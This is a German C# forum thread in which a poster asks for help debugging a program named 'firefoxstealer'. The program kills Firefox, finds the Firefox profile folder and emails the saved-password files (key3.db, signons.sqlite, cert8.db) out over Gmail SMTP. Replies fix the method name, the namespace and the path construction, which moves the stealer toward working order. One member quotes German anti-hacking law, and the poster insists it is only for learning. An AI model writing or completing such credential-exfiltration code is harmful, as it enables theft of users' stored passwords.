hilfe bei fehlermeldung
-
using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.Net.Mail; using System.Net; using System.Diagnostics; namespace firefoxstealer { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { try { Process firefox = Process.GetProcessByName("firefox")[0]; //Fehler1 "System.Diagnostics.Process" enthält keine Definition für[ "GetProcessByName". firefox.Kill(); } catch { } string user = System.Environment.UserName; string path = @"c:\user" + user + @"\AppData\Roaming\Mozilla\Firefox\Profiles"; string[] folders = Directory.GetDirectories(path);//Fehler2 Der Name "Directory" ist im aktuellen Kontext nicht vorhanden. path = folders[0] + @""; string path1 = path + "cert8.db"; string path2 = path + "key3.db"; string path3 = path + "signons.sqlite"; SmtpClient mail = new SmtpClient(); MailMessage msg = new MailMessage("email@googlemail.com", "email@googlemail.com"); msg.Subject = user + "wurde gesnifft!"; msg.Body = "att erfolgreich"; mail.Credentials = new NetworkCredential("email@googlemail.com", "email-pwd"); mail.Host = "smtp.googlemail.com"; Attachment data1 = new Attachment(path1); msg.Attachments.Add(data1); Attachment data2 = new Attachment(path2); msg.Attachments.Add(data2); Attachment data3 = new Attachment(path3); msg.Attachments.Add(data3); mail.Send(msg); } } }
Statt dich zu registrieren hättest du lieber gleich Code-Tags benutzen können.
-
Hallo verpeilt2007 und willkommen im Forum.
1. Tippfehler:
GetProcessByName -> GetProcessesByName2. Fehlende Einbindung des Namespace bzw. nicht vollqualifizierter Typname:
Directory -> System.IO.Directory oder using System.IO;Zu 1: Visual Studio bietet dir dank IntelliSense alle Methoden eines Typs an. Du hättest nur die richtige anwählen müssen.
Zu 2: Wenn ein Namespace nicht eingebunden ist, die Assembly aber bereits referenziert wird, fügt VS zwei "^" ans Ende des Bezeichners. Beispiel: Gib Directory ein und VS hängt orangene ^^ dahinter. Sobald Du dann Ctrl+. drückst, wird automatisch using System.IO; eingefügt und der Typ ist verfügbar.
3: Verwende in Zukunft Code-Tags
-
GetProcessesByName heißt es beim ersten. Siehe hier in der MSDN.
Und beim zweiten hilft der richtige Namespace, System.IO müsste es sein. Und wenn du da nicht genau weißt, aber die Funktionen komplett richtig geschrieben hast (CaseSensitive beachten), dann kannst du per Strg+. entweder den Fullqualified-Name eintragen lassen oder direkt ein using für die Funktion erzeugen lassen.
Mfg Marco
EDIT: Hmm viel zu spät, man sollte mal wieder nicht mehrere Sachen gleichzeitig machen.
-
cool ich danke euch für eure schnelle und gute hilfe habs hin bekommen
ps
was heißt case sensitivy?
-
verpeilt2007 schrieb:
ps
was heißt case sensitivy?Case sensitive bedeutet, dass Gross-Kleinschreibung zaehlt. Das heisst 'Variable' und 'variable' sind zwei unterschiedliche Variabeln.
-
Beachten der Große/Klein Schreibung, also ein GruenerApfel != gruenerApfel
Mfg Marco
-
@Marc-O
Schwierig heute mit dem Erster sein, hmm?
-
es werden keine fehler mehr angezeigt aber beim debuggen kam folgendes
http://img6.imagebanana.com/img/cd9xjets/thumb/Unbenannt.png
hier die fehlerdetails
vorab der pfad C:\Users\vicky\AppData\Roaming\Mozilla\Firefox\Profiles
existiert, ich will zugriff aud den ordner wo in C:\Users\vicky\AppData\Roaming\Mozilla\Firefox\Profiles drinn ist aber desen name individuell istSystem.IO.DirectoryNotFoundException wurde nicht behandelt.
Message=Ein Teil des Pfades "c:\user\vicky\AppData\Roaming\Mozilla\Firefox\Profiles\" konnte nicht gefunden werden.
Source=mscorlib
StackTrace:
bei System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
bei System.IO.FileSystemEnumerableIterator1.CommonInit() bei System.IO.FileSystemEnumerableIterator\
1..ctor(String path, String originalUserPath, String searchPattern, SearchOption searchOption, SearchResultHandler`1 resultHandler)
bei System.IO.Directory.GetDirectories(String path)
bei firefoxstealer.Form1.Form1_Load(Object sender, EventArgs e) in C:\Users\vicky\documents\visual studio 2010\Projects\firefoxstealer\firefoxstealer\Form1.cs:Zeile 39.
bei System.Windows.Forms.Form.OnLoad(EventArgs e)
bei System.Windows.Forms.Form.OnCreateControl()
bei System.Windows.Forms.Control.CreateControl(Boolean fIgnoreVisible)
bei System.Windows.Forms.Control.CreateControl()
bei System.Windows.Forms.Control.WmShowWindow(Message& m)
bei System.Windows.Forms.Control.WndProc(Message& m)
bei System.Windows.Forms.ScrollableControl.WndProc(Message& m)
bei System.Windows.Forms.Form.WmShowWindow(Message& m)
bei System.Windows.Forms.Form.WndProc(Message& m)
bei System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
bei System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
bei System.Windows.Forms.NativeWindow.DebuggableCallback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
bei System.Windows.Forms.SafeNativeMethods.ShowWindow(HandleRef hWnd, Int32 nCmdShow)
bei System.Windows.Forms.Control.SetVisibleCore(Boolean value)
bei System.Windows.Forms.Form.SetVisibleCore(Boolean value)
bei System.Windows.Forms.Control.set_Visible(Boolean value)
bei System.Windows.Forms.Application.ThreadContext.RunMessageLoopInner(Int32 reason, ApplicationContext context)
bei System.Windows.Forms.Application.ThreadContext.RunMessageLoop(Int32 reason, ApplicationContext context)
bei System.Windows.Forms.Application.Run(Form mainForm)
bei firefoxstealer.Program.Main() in C:\Users\vicky\Documents\Visual Studio 2010\Projects\firefoxstealer\firefoxstealer\Program.cs:Zeile 18.
bei System.AppDomain._nExecuteAssembly(RuntimeAssembly assembly, String[] args)
bei System.AppDomain.ExecuteAssembly(String assemblyFile, Evidence assemblySecurity, String[] args)
bei Microsoft.VisualStudio.HostingProcess.HostProc.RunUsersAssembly()
bei System.Threading.ThreadHelper.ThreadStart_Context(Object state)
bei System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean ignoreSyncCtx)
bei System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state)
bei System.Threading.ThreadHelper.ThreadStart()
InnerException:
-
Lies Dir folgendes durch:
http://msdn.microsoft.com/de-de/library/system.environment.specialfolder.aspx
http://msdn.microsoft.com/de-de/library/14tx8hby(v=vs.80).aspx
-
wenn ich das richtig verstehe bedeutet das weil ich auf %appdata% (AppData\Roaming\Mozilla\Firefox\Profiles) zugreifen will aber dies ein versteckter ordner (Systemordner) ist habe ich in dem fall keine berechtigung und muss das ganze anderst deklarien
hab ich das soweit richtig verstanden?
also ändere ich:
string user = System.Environment.UserName;
string path = @"c:\user" + user + @"\AppData\Roaming\Mozilla\Firefox\Profiles";
string[] folders = Directory.GetDirectories(path);um in
string user = System.Environment.UserName;
string path = @"c:\user" + user + @"\AppData\Roaming\Mozilla\Firefox\Profiles";
string[] folders = Directory.GetFolderPath(path);und falls wo soll (Environment.GetFolderPath(Environment.SpecialFolder.System));) hin?
sorry das ich so dumme fragen hab bin neu in dem bereich und lerne by doing
-
Mal abgesehen von deinen derzeitigen Problemen mit dem Programmaufbau, hoffe ich das dieser Firefox Sniffer nur als Proof od Concept gedacht ist, da die verbreitung eines solchen programms doch einige Rechliche Probleme nach sich ziehen könnte.
-
Videonauth schrieb:
Mal abgesehen von deinen derzeitigen Problemen mit dem Programmaufbau, hoffe ich das dieser Firefox Sniffer nur als Proof od Concept gedacht ist, da die verbreitung eines solchen programms doch einige Rechliche Probleme nach sich ziehen könnte.
Das ist doch nur Copy&Paste-Müll.
-
µ schrieb:
Videonauth schrieb:
Das ist doch nur Copy&Paste-Müll.
Das mag sein, und ich sags ja nur und verweise alleine mal auf StGB
§ 202a Ausspähen von Daten
(1) Wer unbefugt sich oder einem anderen Zugang zu Daten, die nicht für ihn bestimmt und die gegen unberechtigten Zugang besonders gesichert sind, unter Überwindung der Zugangssicherung verschafft, wird mit Freiheitsstrafe bis zu drei Jahren oder mit Geldstrafe bestraft.
(2) Daten im Sinne des Absatzes 1 sind nur solche, die elektronisch, magnetisch oder sonst nicht unmittelbar wahrnehmbar gespeichert sind oder übermittelt werden.§ 202b Abfangen von Daten
Wer unbefugt sich oder einem anderen unter Anwendung von technischen Mitteln nicht für ihn bestimmte Daten (§ 202a Abs. 2) aus einer nichtöffentlichen Datenübermittlung oder aus der elektromagnetischen Abstrahlung einer Datenverarbeitungsanlage verschafft, wird mit Freiheitsstrafe bis zu zwei Jahren oder mit Geldstrafe bestraft, wenn die Tat nicht in anderen Vorschriften mit schwererer Strafe bedroht ist.
§ 202c Vorbereiten des Ausspähens und Abfangens von Daten
(1) Wer eine Straftat nach § 202a oder § 202b vorbereitet, indem er
Passwörter oder sonstige Sicherungscodes, die den Zugang zu Daten (§ 202a Abs. 2) ermöglichen, oder
2.
Computerprogramme, deren Zweck die Begehung einer solchen Tat ist,herstellt, sich oder einem anderen verschafft, verkauft, einem anderen überlässt, verbreitet oder sonst zugänglich macht, wird mit Freiheitsstrafe bis zu einem Jahr oder mit Geldstrafe bestraft.
(2) § 149 Abs. 2 und 3 gilt entsprechend.
-
wenn das mein ziel wäre würde ich mir einfach nen stealer builder holen wo mir sämtliche passwörter aller browser (log ind email ftp etc stehlen würde)
und sie mir per php ohne meine anmeldedaten zu brauchen schicken würde.aber das teil hier beinhaltet ja meine eigenen emaildaten (user und pwd)
wenn i9ch sowas für illegale zwecke nutzen würde wär ich doof
dafür gibst überall bessere toolsmir gehts nur drum mich mit der materie auseinander zu setzen
-
verwende doch gleich SpecialFolder.ApplicationData ...
Und ich würde das DirectoryNotFound abfangen entweder mit einem try block oder besser mit System.IO.Directory.Exists
-
@abclalala
Richtig:
1. Thread lesen
2. Antworten verstehen ("SpecialFolder" s.o., "DirectoryNotFound" irrelevant)
3. Selbst antworten, wenn man was zu sagen hatFalsch:
1. Nur Anfangsbeitrag lesen
2. Teilweise falsch verstehen
3. Trotzdem irgendwas posten
4. Directory.Exists ist i.d.R. außerhalb der programmeigenen Ordner und Dateien nicht sicher. Zwischen Abfrage und Verwendung eines Ordners (oder einer Datei) kann ein anderes Programm löschen.
-
verpeilt2007 schrieb:
es werden keine fehler mehr angezeigt aber beim debuggen kam folgendes
http://img6.imagebanana.com/img/cd9xjets/thumb/Unbenannt.png
hier die fehlerdetails
vorab der pfad C:\Users\vicky\AppData\Roaming\Mozilla\Firefox\Profiles
existiert, ich will zugriff aud den ordner wo in C:\Users\vicky\AppData\Roaming\Mozilla\Firefox\Profiles drinn ist aber desen name individuell istSystem.IO.DirectoryNotFoundException wurde nicht behandelt.
Message=Ein Teil des Pfades "c:\user\vicky\AppData\Roaming\Mozilla\Firefox\Profiles\" konnte nicht gefunden werden.
Source=mscorlib
StackTrace:
bei System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
bei System.IO.FileSystemEnumerableIterator1.CommonInit() bei System.IO.FileSystemEnumerableIterator\
1..ctor(String path, String originalUserPath, String searchPattern, SearchOption searchOption, SearchResultHandler`1 resultHandler)
bei System.IO.Directory.GetDirectories(String path)
bei firefoxstealer.Form1.Form1_Load(Object sender, EventArgs e) in C:\Users\vicky\documents\visual studio 2010\Projects\firefoxstealer\firefoxstealer\Form1.cs:Zeile 39.
bei System.Windows.Forms.Form.OnLoad(EventArgs e)
bei System.Windows.Forms.Form.OnCreateControl()
bei System.Windows.Forms.Control.CreateControl(Boolean fIgnoreVisible)
bei System.Windows.Forms.Control.CreateControl()
bei System.Windows.Forms.Control.WmShowWindow(Message& m)
bei System.Windows.Forms.Control.WndProc(Message& m)
bei System.Windows.Forms.ScrollableControl.WndProc(Message& m)
bei System.Windows.Forms.Form.WmShowWindow(Message& m)
bei System.Windows.Forms.Form.WndProc(Message& m)
bei System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
bei System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
bei System.Windows.Forms.NativeWindow.DebuggableCallback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
bei System.Windows.Forms.SafeNativeMethods.ShowWindow(HandleRef hWnd, Int32 nCmdShow)
bei System.Windows.Forms.Control.SetVisibleCore(Boolean value)
bei System.Windows.Forms.Form.SetVisibleCore(Boolean value)
bei System.Windows.Forms.Control.set_Visible(Boolean value)
bei System.Windows.Forms.Application.ThreadContext.RunMessageLoopInner(Int32 reason, ApplicationContext context)
bei System.Windows.Forms.Application.ThreadContext.RunMessageLoop(Int32 reason, ApplicationContext context)
bei System.Windows.Forms.Application.Run(Form mainForm)
bei firefoxstealer.Program.Main() in C:\Users\vicky\Documents\Visual Studio 2010\Projects\firefoxstealer\firefoxstealer\Program.cs:Zeile 18.
bei System.AppDomain._nExecuteAssembly(RuntimeAssembly assembly, String[] args)
bei System.AppDomain.ExecuteAssembly(String assemblyFile, Evidence assemblySecurity, String[] args)
bei Microsoft.VisualStudio.HostingProcess.HostProc.RunUsersAssembly()
bei System.Threading.ThreadHelper.ThreadStart_Context(Object state)
bei System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean ignoreSyncCtx)
bei System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state)
bei System.Threading.ThreadHelper.ThreadStart()
InnerException:Also, falls das Problem noch besteht würde ich es mal mit c:\users und nicht mit c:\user versuchen
-
JCarlson schrieb:
Also, falls das Problem noch besteht würde ich es mal mit c:\users und nicht mit c:\user versuchen
Lies doch bitte zuerst mal den Thread, bevor du eine Antwort gibst. Wenn ich mich auf den Beitrag von μ beziehe, dann machst du noch weniger richtig als abclalala.
Grüssli
-
Das tut ja schon Körperlich weh.
µ hat eigentlich alles gesagt
"Das ist doch nur Copy&Paste-Müll."
"2. Antworten verstehen ("SpecialFolder" s.o., "DirectoryNotFound" irrelevant)"
...1. Lieger Environment.SpecialFolder.ApplicationData verwenden statt dies Zeug selber zusammen zu bauen
2. Korrekt zusammebauen
3. Prüfen ob der Ordner vorhanden istAlles in allen wird der Code recht kurz, sicher und vor allem auch unter Windows XP funktionieren 8Sofern FF da auch dort liegt)
var path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); path = Path.Combine(path, @"Firefox\Profiles"); if (Directory.Exists(path)) DoSomething(path);
-
Ich habe mir den Thread durchgelesen, allerdings wird ihm die vorgeschlagenen Lösungen nicht helfen wenn er weiterhin einen falschen Pfad verwendet.
EDIT:
Achso, wenn er mit :
var path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
darauf zugreift hat sich das natürlich erledigt^^